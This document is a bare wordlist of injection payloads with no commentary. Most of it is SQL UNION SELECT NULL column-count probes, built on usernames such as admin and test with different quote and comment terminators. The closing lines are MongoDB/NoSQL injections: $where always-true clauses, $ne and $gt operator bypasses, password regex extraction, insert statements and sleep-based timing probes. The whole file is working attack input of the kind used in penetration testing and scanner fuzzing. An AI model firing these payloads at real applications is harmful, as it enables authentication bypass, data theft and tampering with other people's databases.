user UNION SELECT NULL,NULL,NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL,NULL,NULL/*
admin UNION SELECT NULL,NULL,NULL,NULL,NULL--
admin UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
admin UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
admin UNION SELECT NULL,NULL,NULL,NULL,NULL#
admin UNION SELECT NULL,NULL,NULL,NULL,NULL;
admin UNION SELECT NULL,NULL,NULL,NULL,NULL;#
admin UNION SELECT NULL,NULL,NULL,NULL,NULL/*
adam UNION SELECT NULL,NULL,NULL,NULL,NULL--
adam UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
adam UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
adam UNION SELECT NULL,NULL,NULL,NULL,NULL#
adam UNION SELECT NULL,NULL,NULL,NULL,NULL;
adam UNION SELECT NULL,NULL,NULL,NULL,NULL;#
adam UNION SELECT NULL,NULL,NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
user" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
admin" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
adam" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
test" UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
user' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
admin' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
adam' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
test' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
user UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
admin UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
adam UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -;
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
test UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL/*
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
{"$gt": ""}
[$ne]=1
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true
